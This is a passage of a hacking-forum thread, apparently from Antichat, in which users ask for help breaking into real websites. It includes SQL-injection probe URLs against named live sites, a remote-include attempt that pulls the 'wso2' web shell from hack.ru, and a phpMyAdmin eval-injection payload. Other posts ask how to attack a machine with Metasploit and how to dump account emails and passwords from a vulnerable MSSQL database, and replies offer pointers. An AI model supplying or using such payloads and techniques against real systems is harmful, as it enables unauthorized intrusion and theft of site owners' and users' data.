Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Any tutorial on ASP injection please?

    I want to start learning ASP Injection.

    Code:
    http://www.wsstp.eu/content/default.asp?PageId=882'
    Any link? Help? Anything?
     
  2. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    ссори бат ви хэв ноу асп инжекшен туториал. юз гугле, плиииииииииииз.
     
    2 people like this.
  3. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    lightangel
    maybe first you need to learn sql-injection and then move forward?
     
  4. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    I have learnt so much about SQL on PHP sites.

    I just need a link or book about MsAccess.
     
  5. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    http://www.fmsinc.com/microsoftaccess/query/snytax/update-query.html
     
  6. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    I have a problem here guys.

    Code:
    http://www.expomotor-online.com/detalhesauto.php?id=71485'
    Error shows it's vulnerable.

    Cannot get its order by, why?
     
  7. s000r

    s000r Banned

    Joined:
    28 Sep 2011
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    phpmyadmin 2.11.10 есть ли что по уязвимостям?
    /scripts/setup.php есть
    /config/ нет
    Прошу помощи у гуру.
    Заранее спасибо
     
  8. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    https://rdot.org/forum/showthread.php?t=347
     
  9. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    I don't know, this is a very simple injection...
    (take away the spaces)
     
  10. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Yeah it is but you used a tool to get number of columns.
     
  11. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    about what tool you say? this is quite easy to do by hands.
     
  12. s000r

    s000r Banned

    Joined:
    28 Sep 2011
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Видел уже, ничего не получается...
     
  13. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    But it maybe a lot of table with name like admin_accounts or admin_user...in this situation you need a tool...because if you do this work by hand, you spent a lot of time
     
  14. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    Причем здесь таблицы? я говорил о подборе колонок, что это можно и без программ сделать!
     
  15. Samael91

    Samael91 New Member

    Joined:
    2 Dec 2010
    Messages:
    38
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте. Есть сайт с возможностью выполнения произвольного php кода.
    site.ru/file.php?e=phpinfo();
    Подскажите как сделать инклуид шелла с удаленного сайта.
    Пробовал так:
    Code:
    site.ru/file.php?e=@include("http://hack.ru/wso2.txt");
    но не получается :(
    Также пробовал без @ - без результата.
    Подскажите что я делаю не так?
     
  16. zeny

    zeny New Member

    Joined:
    7 Jul 2010
    Messages:
    47
    Likes Received:
    0
    Reputations:
    -5
    дайте помощь по metasploit я хочу атоковать машину на 80 порт но ни как не получается я даже не знаю к чему будет у меня домтуп помогите разобраться вот пост http://forum.antichat.ru/thread304718.html

    также еще вопрос как подбирать нужные сплоиты и нагрузки вот пост
    http://forum.antichat.ru/thread305294.html
     
  17. s000r

    s000r Banned

    Joined:
    28 Sep 2011
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Code:
    server_databases.php?pos=0&dbstats=0&sort_by="]) OR eval($_REQUEST[cmd]); //&sort_order=desc&token=a327a405644acbcce02edb41461a58c9&cmd=phpinfo();
    token=подставляю свой. 0 реакции, показывает форму логина.
    эксплойт от M4g я так понимаю должен выполнять код, прописанный в файле на фтп.
    Результат выполнения выдает страницу scripts/setup.php
    с двумя отличиями, вверху написаны заголовки запроса, а внизу цифра 0
     
  18. h0w1tz3r

    h0w1tz3r New Member

    Joined:
    29 Nov 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Уважаемые, нужна ваша помощь. Есть сайт. Стоит на mssql , он уязвимый. Надо сдампить базу. Проблема в том , что внутри 20 баз, в каждой по 150-200 таблиц. Хави ломает через mssql with error. Шелл залить некуда, подскажите, что в такоц ситуации можно сделать ???
     
  19. o'clock

    o'clock Elder - Старейшина

    Joined:
    16 May 2009
    Messages:
    125
    Likes Received:
    22
    Reputations:
    11
    http://forum.antichat.ru/thread43966.html
    Пункты 2.2.х
    вроде как...
     
  20. h0w1tz3r

    h0w1tz3r New Member

    Joined:
    29 Nov 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Т.е. к примеру , информация нахоидтся в базе мастер, таблица аккаунтс , и 2 колонки имейл и пасс, как это вывести?? С учетом что в mssql не работает. Union функция.
     
Thread Status:
Not open for further replies.